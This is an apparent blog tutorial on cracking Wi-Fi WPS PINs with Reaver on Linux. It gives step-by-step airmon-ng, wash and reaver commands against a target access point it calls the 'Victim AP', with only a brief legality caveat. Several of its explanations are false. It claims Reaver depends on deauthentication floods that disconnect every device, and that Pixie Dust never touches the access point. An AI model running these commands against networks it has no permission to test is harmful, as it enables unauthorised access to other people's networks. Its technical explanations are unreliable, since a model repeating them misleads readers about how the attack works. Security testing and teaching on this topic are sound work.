Brute-Forcing WPS Pins with Reaver in Linux

Reaver is a free and open-source tool that can be used to brute-force WPS PINs. Reaver works by sending a series of deauthentication packets to the target Wi-Fi router. These deauthentication packets force the router to disconnect all connected devices. Once all devices are disconnected, Reaver then attempts to connect to the router using the WPS PIN. If the PIN is incorrect, Reaver will try the next PIN in the list. This process continues until the correct PIN is found.

The primary method employed by Reaver involves initiating a series of deauthentication packets sent to the targeted Wi-Fi router. By flooding the router with these deauthentication packets, Reaver effectively forces the router to disconnect all devices connected to it. This disruption in the connection enables Reaver to exploit the weaknesses in the WPS protocol.

Once the router has disconnected all devices, Reaver proceeds to systematically attempt to establish a connection with the router by guessing the WPS PIN. The WPS PIN is typically an eight-digit numeric code used to authenticate devices to the router without the need for a lengthy passphrase. Reaver operates by cycling through a list of possible PIN combinations, attempting each one until it either successfully connects or exhausts all the options.

What is WPS?

Wi-Fi Protected Setup (WPS) is a security standard that allows you to connect devices to a wireless network without having to enter a long, complex password. WPS was created to make it easier to set up wireless networks for home users, but it has been criticized for being less secure than traditional methods of authentication.

WPS Attack Algorithm:

There are two main types of WPS attack algorithms:

Online and Offline

Online to crack the PIN code by sending requests to the access point over the network. Offline attacks, on the other hand, do not require access to the network, and instead rely on captured handshake data.The most common online WPS attack algorithm is Reaver. Reaver works by sending a series of requests to the access point, and then analyzing the responses to determine the PIN code. The attack is typically successful within a few hours, depending on the complexity of the PIN code. There are also a number of offline WPS attack algorithms available. One of the most common is Pixie Dust. Pixie Dust works by exploiting a vulnerability in the WPS protocol that allows an attacker to obtain the PIN code without having to interact with the access point. The attack is typically successful within a few minutes.

What is Brute Force Attack?

A brute force attack is a method of trying every possible combination of characters until the correct one is found. This can be used to crack passwords, PINs, and other security measures.

For example, if an attacker wants to gain access to a computer system, they might try to brute-force the password by entering every possible combination of letters, numbers, and symbols until they find the correct one. This can be a very time-consuming process, but it is possible if the attacker has enough time and resources.

Brute forcing a WPS PIN is a method of trying every possible combination of 8 digits until the correct one is found. This can be used to gain access to a Wi-Fi network that has WPS enabled.

WPS (Wi-Fi Protected Setup) is a feature that allows users to easily set up a Wi-Fi network by entering a PIN instead of a complex password. However, WPS has been shown to be vulnerable to brute-force attacks. To brute-force a WPS PIN, an attacker can use a tool like Reaver.

Features of Reaver:

1. WPS PIN Recovery

2. Automated Brute-Force

3. Pixie Dust Attack Support

4. Advanced Configuration Options

5. Status Monitoring

Reaver is preinstalled on Kali Linux and other Linux security distributions. There is no need to download or install it separately.

Brute-Forcing WPS Pins with Reaver in Linux

Step 1: First we have to put our wireless interface in monitor mode. To do this type the following command in the terminal.

sudo airmon-ng start wlan0

As you can see in the above image wlan0 is now in monitor mode named wlan0mon.

Step 2: Now we can search for any Access Point which has WPS enabled and it is unlocked. Type the following command to do so.

sudo wash -i <interface>

Note: wlan0mon is the wireless interface which is in monitor mode.

You can see the list of APS with WPS versions and whether it’s locked or unlocked.

Step 3: Copy the BSSID of the AP which you want to get connected to by cracking WPS Pin.

Step 4: Type the following command to run reaver and see all the commands to crack WPS Pin.

reaver -h

Step 5: Type the following command to run the Brute-Forcing WPS Pins with Reaver.

sudo reaver -i wlan0mon -b 4C:22:F3:FA:60:9D -S -v

-i – It states the name of the interface to be used.

-b – It states the bssid of the Victim AP.

-S – It tells the tool to use small DH (Diffie–Hellman) keys to improve crack speed.

-v – It Display non-critical warnings.

Now the tool will try all the possible pins to crack the WPS Pin of the target. Once the correct pin found, It will display it and you can now connect to the network without the password.

As you can see, the Pin has been cracked.

Here are some of the things to keep in mind when using Reaver:

• Reaver can only be used against APs that support WPS.
• Reaver is a brute-force attack, so it can take a long time to crack the WPS PIN.
• Reaver can be detected by some APs, which may cause the AP to lock its WPS functionality.
• Using Reaver to crack the WPS PIN of an AP is illegal in some jurisdictions.

Conclusion:

Reaver is a powerful tool that can be used to test the security of Wi-Fi networks by exploiting vulnerabilities in the Wi-Fi Protected Setup (WPS) feature. While it can be a valuable tool for educational and research purposes, it is important to use it responsibly and ethically. The primary purpose of Reaver’s development was to raise awareness about the security flaws in WPS implementations and encourage manufacturers and users to adopt more secure authentication methods. Disabling WPS on Wi-Fi routers and employing stronger authentication, such as WPA2-PSK or WPA3, is crucial for ensuring the security of wireless networks.